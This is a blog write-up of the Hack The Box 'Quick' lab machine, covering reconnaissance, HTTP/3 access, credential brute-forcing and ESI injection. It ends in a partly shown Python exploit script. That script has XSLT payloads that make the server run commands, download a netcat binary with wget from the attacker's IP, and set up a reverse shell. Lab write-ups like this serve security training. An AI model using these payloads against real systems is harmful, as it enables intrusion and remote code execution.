<!DOCTYPE html><html lang="en" mode="dark" > <!-- The Head v2.0 https://github.com/zeroryuki/ © 2017-2019 zRyuki MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="description" content="HTB Machine Write Up - Quick"><title>Hack The Box Write Up - Quick | zRyuki</title><meta name="generator" content="Jekyll v4.0.0" /><meta property="og:title" content="Hack The Box Write Up - Quick" /><meta name="author" content="zRyuki" /><meta property="og:locale" content="en_US" /><meta name="description" content="HTB Machine Write Up - Quick" /><meta property="og:description" content="HTB Machine Write Up - Quick" /><link rel="canonical" href="https://zeroryuki.github.io/posts/quick/" /><meta property="og:url" content="https://zeroryuki.github.io/posts/quick/" /><meta property="og:site_name" content="zRyuki" /><meta property="og:image" content="https://zeroryuki.github.io/img/Quick/badge.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-04-29T16:21:23+08:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://zeroryuki.github.io/img/Quick/badge.png" /><meta property="twitter:title" content="Hack The Box Write Up - Quick" /><meta name="twitter:site" content="@twitter_username" /><meta name="twitter:creator" content="@zRyuki" /><meta name="google-site-verification" content="uR4O3tdC8ptzD19y4h81kQmgw4DIjwMC-FIW5gIrfkM" /> <script type="application/ld+json"> {"headline":"Hack The Box Write Up - Quick","dateModified":"2020-04-29T16:21:23+08:00","datePublished":"2020-04-29T16:21:23+08:00","author":{"@type":"Person","name":"zRyuki"},"description":"HTB Machine Write Up - Quick","mainEntityOfPage":{"@type":"WebPage","@id":"https://zeroryuki.github.io/posts/quick/"},"image":"https://zeroryuki.github.io/img/Quick/badge.png","@type":"BlogPosting","url":"https://zeroryuki.github.io/posts/quick/","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/zeroryuki/ © 2019 zRyuki Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/icons.css"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/custom.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script> window.jQuery || document.write('<script src="/assets/lib/jquery-3.4.1.min.js"><\/script>'); </script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha256-5+02zu5UULQkO7w1GIr6vftCgMfFdZcAHeDtFnKZsBs=" crossorigin="anonymous" async></script> <script src="/assets/js/dist/commons.js" async></script><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script> <script src="/assets/js/dist/tooltip-loader.min.js" async></script><meta content="zRyuki" property="og:site_name"><meta content="Hack The Box Write Up - Quick" property="og:title"><meta content="article" property="og:type"><meta content="HTB Machine Write Up - Quick" property="og:description"><meta content="https://zeroryuki.github.io/posts/quick/" property="og:url"><meta content="2020-04-29T16:21:23+08:00" property="article:published_time"><meta content="https://zeroryuki.github.io/about/" property="article:author"><meta content="https://zeroryuki.github.io/img/Quick/badge.png" property="og:image"><meta content="machine" property="article:section"><meta content="htb" property="article:tag"><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/zeroryuki/ © 2017-2019 zRyuki MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="https://avatars2.githubusercontent.com/u/34531838" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">zRyuki</a></div><div id="site-subtitle" class="font-italic">Systems were built to be owned</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/zeroryuki" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/twitter_username" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="javascript:window.open('mailto:' + ['zeroryuki','gmail.com'].join('@'))"> <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" target="_blank"> <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/zeroryuki/ © 2017-2019 zRyuki MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Hack The Box Write Up - Quick</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hack The Box Write Up - Quick</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Wed, Apr 29, 2020, 4:21 PM +0800"> Apr 29, 2020 <i class="unloaded">2020-04-29T16:21:23+08:00</i> </span> by <span class="author"> zRyuki </span></div></div><div class="row"><div class="col-lg-6"> <img src="/img/Quick/icon.png"></div><div class="col-lg-5"><h2 data-toc-skip class="text-center">Quick</h2><p></p><table class="table table-hover table-striped"><tbody><tr><td class="text-right">OS:<td> <img src="/img/Linux.png" height="15"> Linux<tr><td class="text-right">Difficulty:<td> <span class="text-danger bold"> Hard</span><tr><td class="text-right">Points:<td><span class="text-success">40</span><tr><td class="text-right">Release:<td>25 Apr 2020<tr><td class="text-right">IP:<td>10.10.10.186</table></div></div><div class="post-content"><h2 id="info-gathering">Info Gathering</h2><h3 id="nmap">Nmap</h3><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre><td class="rouge-code"><pre># Nmap 7.80SVN scan initiated Wed Apr 29 16:23:39 2020 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /home/z3r0/CTF/HTB/Machine/Quick/scans/_quick_tcp_nmap.txt -oX /home/z3r0/CTF/HTB/Machine/Quick/scans/xml/_quick_tcp_nmap.xml 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up, received user-set (0.27s latency).
Scanned at 2020-04-29 16:23:41 +08 for 126s
Not shown: 998 closed ports
Reason: 998 conn-refused
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAhDT34CIPsYTsmKvg6TepNSC8Qly/KBzvto2U2dc5bWLnOTeCHQrlzT0nk/GHBGsvCVi9JJmSw6BHeQ0sllrO4jvQpW/jQuY65cyOmNsXZcXvLXKk/M9rYws+8EOWrzKWJRIyIcD1+NdXKia8oYJ8GtTb8MAFff63dPrCD3qJIWgE0BQ00Id2CebD8Ffml75qXoufBpNQagMjorURWnq5W9lUpCSuqtLYAgasiW6/tlfBb80PFlmltDmshCJ+WsfZ0v2PK2eDveEM4PvlLyFLcGSJcshgGUA/jbDefwoon5uqgKduuS/RZJxf5PqBXkFIem9lsRl9SJCQLqKnQdh3
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOL3mI404EpOFWUunEsaZUSo5I91lYin8r4Tt5HbcKkP1cEjnLRfpWP3HLYZbikwoZG17SmA3cwn/BPUslPpPWI=
|   256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC3sX8n1GsA1Ps9e3OZmBVSkbr1tv7B/25+Njhuz9Z76
9001/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 29 16:25:47 2020 -- 1 IP address (1 host up) scanned in 127.56 seconds

</pre></table></code></div></div><p>Open port: <strong>22, 9001</strong></p><h3 id="web">Web</h3><h4 id="landing-page">Landing page</h4><p>Visited the main page, and landed on simple page with some info.</p><p><img src="/img/Quick/2020-04-29-16-27-13.png" alt="" /></p><p>There was 3 links on the page:</p><ol><li>login</li><li>clients</li><li>portal</li></ol><h4 id="login">Login</h4><p>This the first links need to be checked, as usual, login sistem tends to have some flaw or will leak juicy info</p><p><img src="/img/Quick/2020-04-29-16-27-39.png" alt="" /></p><p>Spent some time in here without result. Move on</p><h4 id="clients">Clients</h4><p>Looking up this page, it just simple list of their client without anything useful. So far</p><p><img src="/img/Quick/2020-05-02-12-50-26.png" alt="" /></p><h4 id="portal">Portal</h4><p>Read about the update, it gave useful hint actually. It says about the latest <strong>TLS and HTTP</strong>.</p><p><img src="/img/Quick/2020-05-02-12-41-55.png" alt="" /></p><p>Clink on the link, got error refused to connect as if the host not there. Now read again the update message. Yeah it using HTTP3 which is served in UDP port. Googling a lot about how to bypass it, led to nowhere. In fact its not how to bypass it, but how to access it. Looking for this, came up with this project</p><p><a href="https://github.com/cloudflare/quiche">https://github.com/cloudflare/quiche</a></p><h3 id="http3">HTTP3</h3><h4 id="quiche">Quiche</h4><p>Read about it a lot, and I got several options to access http3 protocol. I’m a lazy person, I normally will avoid compiling anything or downloading extra tool which I will not be used so much. Looking for other options, I’m lucky because of Arch user, there is a package for this. To make my default curl to support http3, I need to recompile it, and uninstall it first and it will break lot of my packages. So I just using this AUR package.</p><p><a href="https://aur.archlinux.org/packages/curl-http3/">https://aur.archlinux.org/packages/curl-http3/</a></p><h4 id="curl3">Curl3</h4><p>After done installing it, run it as normal curl but the binary named with curl3. run it as</p><p><code class="highlighter-rouge">curl3 --http3 https://portal.quick.htb</code>.</p><p>Yeah, successfully fetched the content.</p><p><img src="/img/Quick/2020-04-30-08-25-19.png" alt="" /></p><p>Clearly there was 3 links there. I’m interested with docs. Went into that link and got 2 links for pdf files. Grab it!!</p><p><img src="/img/Quick/2020-04-30-08-35-12.png" alt="" /></p><p><strong>Connectivity.pdf</strong></p><p><img src="/img/Quick/2020-04-30-08-32-47.png" alt="" /></p><p>Read the content of the pdf, saw juicy info about the access password.</p><p><img src="/img/Quick/2020-04-30-08-36-02.png" alt="" /></p><p>It tells about the registered email. Means I need to search for it. Searching through the portal, and didn’t find related email unless the workers email. Bruteforce maybe.</p><h2 id="exploitation">Exploitation</h2><p>Following what the file told, the login page can be accessed by the client’s email and <code class="highlighter-rouge">Quick4cc3$$</code> as the pass. I don’t have the the email, and the hint told <strong>registered email</strong>. After inspecting the page again, there was a section for testimony by the client.</p><p><img src="/img/Quick/2020-05-02-13-47-35.png" alt="" /></p><p>I can see 4 names there. With a thought of one of them must have the access to the login page, I could construct an email format to be paired with one of the names there. Format as follow:</p><p>client name @ companyname.com</p><h3 id="burp-intruder">Burp Intruder</h3><p>After intercept the login process, just send it to the intruder and using <strong>cluster bomb</strong> attack.</p><p>I’m going to guess the email, so put the marker to be injected in the email field. After struggling for several attempts, look back to the client list on the webpage, there was a column for the country. Lucky the country list started with UK, so I changed .com to <code class="highlighter-rouge">co.uk</code> for 2nd level domain</p><p><img src="/img/Quick/2020-04-30-18-05-34.png" alt="" /></p><p>Launch the attack and hit the correct cred.</p><p><img src="/img/Quick/2020-04-30-18-07-41.png" alt="" /></p><p>Email:<code class="highlighter-rouge">elisa@wink.co.uk</code></p><p>Try it in the login page, got redirect to the ticket page as Elisa. Nice</p><h3 id="ticket-page">Ticket page</h3><p>This page was for the ticket system for the client when having any issues. Playing around with the system, got 2 parts might be vulnerable.</p><p>The first one is to track the ticket. Put the ticket number, it will load the info below it.</p><p><img src="/img/Quick/2020-04-30-17-59-50.png" alt="" /></p><p><img src="/img/Quick/2020-05-02-14-05-12.png" alt="" /></p><p>trying to submit the ticket</p><p><img src="/img/Quick/2020-05-02-14-08-13.png" alt="" /></p><p><img src="/img/Quick/2020-05-02-14-09-04.png" alt="" /></p><p>At first i thought about sqli. Trying with it, nothing popped out. Then check again the header.</p><p><img src="/img/Quick/2020-05-02-14-12-11.png" alt="" /></p><p>This unusual header should be investigated. Googling about esigate exploit, landed on this useful site.</p><p><a href="https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/">https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/</a></p><p>Follows the article and testing it with the ticket submit page. Put the stylesheet reference to my ip. Run simple http server on my machine, and on the ticket search page, search for my ticket number.</p><p><img src="/img/Quick/2020-05-02-14-21-46.png" alt="" /></p><p>my simple http server got a response from the machine.</p><p><img src="/img/Quick/2020-05-02-14-25-38.png" alt="" />.</p><p>It can be exploited!!. With this flow, I can get RCE to spawn a reverse shell. Below how I did it.</p><h3 id="revshell">Revshell</h3><p>Login as elisa</p><p><img src="/img/Quick/2020-05-01-19-04-56.png" alt="" /></p><p>post ticket</p><p><img src="/img/Quick/2020-05-01-19-05-24.png" alt="" /></p><p>search ticket to activate</p><p><img src="/img/Quick/2020-05-01-19-05-49.png" alt="" /></p><p>got shell</p><p><img src="/img/Quick/2020-05-01-17-01-55.png" alt="" /></p><h2 id="privesc">Privesc</h2><p><strong><em>Since Traceback machine, I’m not going to get the user.txt flag right away because of the dynamic flag. I will go to privesc. Due to the nature of this machine kept get reset via user or the script from the machine, I’m getting tired to get my shell back. I made a bash script to automate all the processes, and add my ssh key after shell spawned. The next process did through ssh session.</em></strong></p><p><strong><em>UPDATED: 15-May. Replace the bash script with python script, using loop due to 404 error if the file exists because of the cache</em></strong></p><video width="750" height="400" controls=""> <source src="/img/Quick/expl.mp4" type="video/mp4" /> </video><p>Here my python script for auto exploit</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">requests</span><span class="p">,</span> <span class="n">sys</span><span class="p">,</span> <span class="n">os</span><span class="p">,</span> <span class="n">argparse</span><span class="p">,</span> <span class="n">subprocess</span>

<span class="n">ap</span> <span class="o">=</span> <span class="n">argparse</span><span class="p">.</span><span class="n">ArgumentParser</span><span class="p">(</span><span class="n">description</span><span class="o">=</span><span class="s">"Quick Machine Initial Shell"</span><span class="p">)</span>
<span class="n">ap</span><span class="p">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s">"myip"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"My HTB vpn ip Ex: 10.10.14.100"</span><span class="p">)</span>
<span class="n">ap</span><span class="p">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s">"-u"</span><span class="p">,</span><span class="s">"--upload"</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s">'Uploader'</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"upload filename"</span><span class="p">)</span>
<span class="n">ap</span><span class="p">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s">"-r"</span><span class="p">,</span> <span class="s">"--reverse"</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s">'Revshell'</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"reverse shell filename"</span><span class="p">)</span>
<span class="n">ap</span><span class="p">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s">"-p"</span><span class="p">,</span><span class="s">"--port"</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s">'listener port'</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"listener port to be used"</span><span class="p">)</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">ap</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">email</span><span class="p">,</span><span class="n">password</span><span class="p">):</span>
    <span class="n">url</span> <span class="o">=</span> <span class="s">"http://"</span><span class="o">+</span><span class="n">Machine</span><span class="o">+</span><span class="s">":"</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">PORT</span><span class="p">)</span><span class="o">+</span><span class="s">"/login.php"</span>
    <span class="n">payload</span><span class="o">=</span><span class="p">{</span><span class="s">"email"</span><span class="p">:</span><span class="n">email</span><span class="p">,</span><span class="s">"password"</span><span class="p">:</span><span class="n">password</span><span class="p">}</span>
    <span class="n">headers</span><span class="o">=</span> <span class="p">{</span><span class="s">"Referer"</span><span class="p">:</span> <span class="s">"http://quick.htb:9001/login.php"</span><span class="p">}</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span><span class="n">allow_redirects</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
    <span class="n">cookie</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">headers</span><span class="p">[</span><span class="s">'Set-Cookie'</span><span class="p">]</span> <span class="c1"># Return the cookie
</span>    <span class="n">cookie</span> <span class="o">=</span> <span class="n">cookie</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">";"</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
    <span class="k">return</span> <span class="n">cookie</span>

<span class="k">def</span> <span class="nf">create_ticket</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span><span class="n">c</span><span class="p">):</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"="</span><span class="p">)</span>
    <span class="n">cookie</span><span class="o">=</span><span class="p">{</span><span class="n">c</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span><span class="n">c</span><span class="p">[</span><span class="mi">1</span><span class="p">]}</span>
    <span class="n">url</span> <span class="o">=</span> <span class="s">"http://"</span><span class="o">+</span><span class="n">Machine</span><span class="o">+</span><span class="s">":"</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">PORT</span><span class="p">)</span><span class="o">+</span><span class="s">"/ticket.php"</span>
    <span class="n">msg</span><span class="o">=</span><span class="s">"""&lt;esi:include src="http://127.0.0.1/" stylesheet="http://"""</span><span class="o">+</span><span class="n">myip</span><span class="o">+</span><span class="s">""":8000/"""</span><span class="o">+</span><span class="n">filename</span><span class="o">+</span><span class="s">""".xsl"&gt;&lt;/esi:include&gt;"""</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="p">{</span><span class="s">"title"</span><span class="p">:</span><span class="s">"test"</span><span class="p">,</span><span class="s">"msg"</span><span class="p">:</span><span class="n">msg</span><span class="p">,</span><span class="s">"id"</span><span class="p">:</span><span class="n">filename</span><span class="p">}</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span><span class="n">cookies</span><span class="o">=</span><span class="n">cookie</span><span class="p">,</span><span class="n">allow_redirects</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
    <span class="c1">#print(response.text)
</span>    <span class="k">return</span> <span class="n">response</span>

<span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span><span class="n">c</span><span class="p">):</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"="</span><span class="p">)</span>
    <span class="n">cookie</span><span class="o">=</span><span class="p">{</span><span class="n">c</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span><span class="n">c</span><span class="p">[</span><span class="mi">1</span><span class="p">]}</span>
    <span class="n">url</span> <span class="o">=</span> <span class="s">"http://"</span><span class="o">+</span><span class="n">Machine</span><span class="o">+</span><span class="s">":"</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">PORT</span><span class="p">)</span><span class="o">+</span><span class="s">"/search.php?search="</span><span class="o">+</span><span class="n">filename</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">cookies</span><span class="o">=</span><span class="n">cookie</span><span class="p">,</span><span class="n">allow_redirects</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
    <span class="c1">#print(response.text)
</span>
<span class="n">proc</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">Popen</span><span class="p">(</span><span class="s">'python -m http.server'</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stderr</span><span class="o">=</span><span class="n">subprocess</span><span class="p">.</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="c1">#out = proc.stdout.read()
#print(str(out))
</span><span class="n">Machine</span> <span class="o">=</span> <span class="s">"quick.htb"</span>
<span class="n">PORT</span> <span class="o">=</span> <span class="mi">9001</span>
<span class="n">username</span> <span class="o">=</span> <span class="s">"elisa@wink.co.uk"</span>
<span class="n">passw</span> <span class="o">=</span> <span class="s">"Quick4cc3$$"</span>
<span class="n">myip</span> <span class="o">=</span> <span class="n">args</span><span class="p">.</span><span class="n">myip</span>
<span class="n">myport</span> <span class="o">=</span> <span class="n">args</span><span class="p">.</span><span class="n">port</span>
<span class="n">up</span> <span class="o">=</span> <span class="n">args</span><span class="p">.</span><span class="n">upload</span>
<span class="n">rev</span> <span class="o">=</span> <span class="n">args</span><span class="p">.</span><span class="n">reverse</span>
<span class="n">ext</span> <span class="o">=</span> <span class="s">".xsl"</span>

<span class="n">upload</span> <span class="o">=</span> <span class="s">"""&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;
&lt;xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="java.lang.Runtime"&gt;&gt;
&lt;xsl:template match="/"&gt;
&lt;xsl:variable name="up" select="rt:exec(rt:getRuntime(), 'wget -O /var/tmp/nc http://{}:8000/nc')"/&gt;
&lt;xsl:value-of select="$up" /&gt;
&lt;/xsl:template&gt;
&lt;/xsl:stylesheet&gt;
"""</span>

<span class="n">reverse</span> <span class="o">=</span> <span class="s">"""&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;
&lt;xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="java.lang.Runtime"&gt;&gt;
&lt;xsl:template match="/"&gt;
&lt;xsl:variable name="perm" select="rt:exec(rt:getRuntime(), 'chmod 777 /var/tmp/nc')"/&gt;
